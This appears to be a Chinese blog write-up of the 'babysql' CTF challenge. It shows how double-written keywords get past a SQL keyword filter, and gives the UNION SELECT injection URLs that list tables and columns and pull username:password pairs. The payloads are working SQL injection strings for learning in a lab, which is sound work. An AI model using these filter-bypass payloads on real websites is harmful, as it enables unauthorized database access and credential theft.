网络安全学习笔记——bypass绕过(babysql)

注意点——在注入的时候测试过or是被过滤了的,所以之后所有的关键字涉及or的地方都会被挖掉,所以遇见or也要乱序双写 ,遇见关键字也是要乱序双写

闭合以及注释都在传参的后面完成

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'-- -

此时and关键字被过滤
1. 可使用like关键字代替;anandd乱序绕过——同样order by乱序也可绕过
2. 使用And发现大小写不行;&&代替and的逻辑操作符不行
3. 使用or————发现仍旧被过滤

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'and 1=1-- -

使用order by 查询数据表列数

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'oorrder bbyy 3-- -

然后联合查询————仍旧使用乱序绕过

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,database(),3-- -

查到数据库名为geek,然后爆表名

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema=database()-- -

得到表名有b4bsql和geekuser,然后爆列名

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'-- -

此时得到flag

http://ab27899d-40b7-4e84-9fc8-c7c334c13c3a.node4.buuoj.cn:81/check.php?username=1&password=1'ununionion seselectlect 1,group_concat(username,0x3a,passwoorrd),3 frfromom b4bsql-- -


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Nosery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值